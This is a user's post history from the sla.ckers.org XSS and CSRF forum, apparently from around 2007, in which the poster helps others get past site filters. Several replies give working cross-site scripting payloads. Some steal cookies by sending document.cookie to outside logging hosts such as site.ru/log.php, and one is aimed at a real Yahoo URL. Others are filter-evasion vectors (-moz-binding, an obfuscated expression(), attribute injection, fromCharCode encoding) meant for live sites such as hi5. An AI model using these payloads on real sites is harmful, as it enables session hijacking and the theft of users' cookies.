Sla.ckers.org
Q and A on cross-site request forgeries and breaking into sessions. It's one of the attacks that XSS enables and the attack of the future. Covers session fixation, hijacking, lockout, replay, session riding, etc.

Current Page: 1 of 5
Results 1 - 30 of 149
7 years ago
hasse
I have the book!
Forum: XSS Info
7 years ago
hasse
My order shipped today, estimated arrival time is 8 June 2007.
Forum: XSS Info
7 years ago
hasse
Mephisto Wrote:
> Sorry, I wasn't addressing the (<, ") encoding in my response. If the application is doing HTML Encoding (converting < or %3c to &lt;) then you're pretty much out of luck.

Unless you can create the XSS inside the tag.
Forum: XSS Info
7 years ago
hasse
digitalIllusionism Wrote:
> @hasse:
> Isn't this byte 219?
> Momby's example is functional. I'm not certain where I would specify a length value, but I only overwrote between "" and "", rather than changing the length. In other words: My string is precisely the same size as Momby's, so
Forum: CSRF and Session Info
7 years ago
hasse
Couldn't you do something like: document.body.innerHTML.replace(input,output); and then add the CSS or other parts you may lose.
Forum: XSS Info
7 years ago
hasse
digitalIllusionism Wrote:
> > Use a hex editor to edit the file and go to byte number 219 (the first byte being byte 0)."
>
> I thought a hex editor was any text editor designed for coding. I've made progress by learning what a hex editor is. Thank you. I haven't been successful at usin
Forum: CSRF and Session Info
7 years ago
hasse
How about setting a chrome URL as the homepage somehow? I tried it and I had to edit the config files by hand to stop it from crashing constantly.
Forum: CSRF and Session Info
7 years ago
hasse
digitalIllusionism Wrote:
> That's the part I don't get. I see no part in the example that resembles the structure of the string "0xdb" in the example. I know "0x" denotes the beginning of a memory address but I don't see how that has anything to do with getting this functional. It looks like
Forum: CSRF and Session Info
7 years ago
hasse
mynice Wrote:
> Ehrmmm... JavaScript is fully enabled (no script blockers or similar) in Firefox2 and IE6. It doesn't execute in both browsers. :(
>
> Edit: The "alert(String.fromCharCode(88,83,83))" even shows up as a message. I can see this injection string as message text. Exactly how d
Forum: XSS Info
7 years ago
hasse
fireboy Wrote:
> none of those solutions work kishord

Does something like this work? http://business.cn.yahoo.com/bso?p=&pid="><script>document.write("<img src=http://site.ru/log.php?"%2Bdocument.cookie%2B">")</script>&ei=UTF-8&ch=ch You should be able to do that via an
Forum: XSS Info
7 years ago
hasse
hwEll Wrote:
> Yeah I know that but I'm asking for the code too..

Just do a Google search for something like "php cookie stealer" and you'll find one.
Forum: XSS Info
7 years ago
hasse
You need a simple PHP script that basically writes the GET parameters to a file. And then you need to make the user load your PHP script with the cookie as a parameter. For example: http://www.site.com/search.php?q=<script>document.write("<img src=http://your-site.ru/stealer.php?"+document.cookie+">")</script>
Forum: XSS Info
7 years ago
hasse
Try this: style=-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss);xx:expression(alert(1111))
Forum: XSS Info
7 years ago
hasse
Delixe Wrote:
> Yes but how is it possible to execute any XSS without a native tag? I can't use the < in my URL, it gets stripped completely.

Like some other people have mentioned, if you can input data inside tags it's possible. For example: <a href=YOUR_INPUT>Link</a> Just enter "# onmouseover=alert(1)
Forum: XSS Info
7 years ago
hasse
What if you try loading it as an iframe or image? EDIT: CrYpTiC_MauleR said it too...
Forum: XSS Info
7 years ago
hasse
I think this is quite common for sites like that. I've even found SQL injections on other sites that show you your browser headers.
Forum: XSS Info
7 years ago
hasse
So the book's not quite done yet? Amazon says:
Availability: Usually ships within 1 to 3 weeks.
Shipping estimate: April 12, 2007 - April 16, 2007
Delivery estimate: April 25, 2007 - May 10, 2007
Forum: XSS Info
7 years ago
hasse
/nul Wrote:
> Hello,
>
> I found a site that is vulnerable to XSS via a POST parameter. I just can't reproduce the XSS any other way than by inserting a tag in the Search field. Yeah, I know about WhiteAcid's XSS POST Forwarder (http://www.whiteacid.org/misc/xss_post_forwarder.php). I tried some combinations, but
Forum: XSS Info
7 years ago
hasse
FR3DC3RV Wrote:
> The IE style vector turned into:
>
> <A style="xx: )" href="http://www.hi5.com/friend/profile/displaySameProfile.do?userid=107126449#">a</A>

Ok, how about: <a href=# style=xx:expr/*X*/ession(alert(1111))>a</a>
Forum: XSS Info
7 years ago
hasse
FR3DC3RV Wrote:
> @hasse:
> Yes hannil.freehostia.com worked for me. What I meant is that the style vectors weren't able to bypass the hi5 filter.

Ok, I understand. What part was filtered, or what was the problem?
Forum: XSS Info
7 years ago
hasse
FR3DC3RV Wrote:
> The style vectors didn't work (at least for me).

Does this work for you in IE or Firefox? http://hannil.freehostia.com/style.html
Forum: XSS Info
7 years ago
hasse
DeltaOne Wrote:
> Well, they do block a variety of tags. And as FR3DC3RV said, they block 'ipt>alert(1000)), 'ipt>alert(1000)', leaving only ipt>alert(1000)
>
> What about the style vector? What are you referring to?

Something like this in Firefox: <a href=# style=-moz-binding:url(http://ha.c
Forum: XSS Info
7 years ago
hasse
DeltaOne Wrote:
> Well, I actually tried , and it rendered - I tried to find some way to obfuscate that tag.
>
> I don't think that they check for the endtag for the script to see if someone inserts the tags, because I can very easily add alert('omg!') (although it won't do anything, because doesn't &
Forum: XSS Info
7 years ago
hasse
lobas Wrote:
> Do you have any examples of how I can use this method, as in using document.location='http://site.com/c.php?c='+escape(document.cookie).substr(0,1900)

You can use document.write and String.fromCharCode. For example: <script>document.write(String.fromCharCode(60,115,99,114,105,112,116,62,100,
Forum: XSS Info
7 years ago
hasse
Well at least the other posts aren't expanded to the right too, like in many other forums. EDIT: Right!
Forum: XSS Info
7 years ago
hasse
@tx: I believe that was something other than what I was thinking about.

jungsonn Wrote:
> @hasse
>
> Do you mean the dojo toolkit crossdomain ajax requests?

Yes, perhaps that was it. I found a page here that describes it: http://tagneto.blogspot.com/2006/06/cross-domain-frame-communication-with.html
Forum: XSS Info
7 years ago
hasse
Hmm, I just remembered something I read about transferring data between domains using anchors (#), anyone remember what site that was on?
Forum: XSS Info
7 years ago
hasse
trev Wrote:
> The source code of what? My understanding is that this is reflexive XSS - the JavaScript code inside an image will not execute unless you open it in a frame or a new window and the site itself will hardly do that. You will have to put this frame inside a frame on your site and then there will b
Forum: XSS Info
7 years ago
hasse
trev Wrote:
> The image doesn't have to be malformed, many image formats allow you to put comments into the images.
>
> If there is no session you cannot steal any information. You can only create a frame with a login form and hope the user types his password into it.

Couldn't he read the source code with
Forum: XSS Info
7 years ago
hasse
Mephisto Wrote:
> okay, found a site where I can put in "" and anything else like that (, , , etc...), but it won't allow the start tags (, , , , etc...) Anyone know of a way around this??
>
> It appears to filter anything that is < and any Aa-Zz character after that.
>
> Update: I c
Forum: XSS Info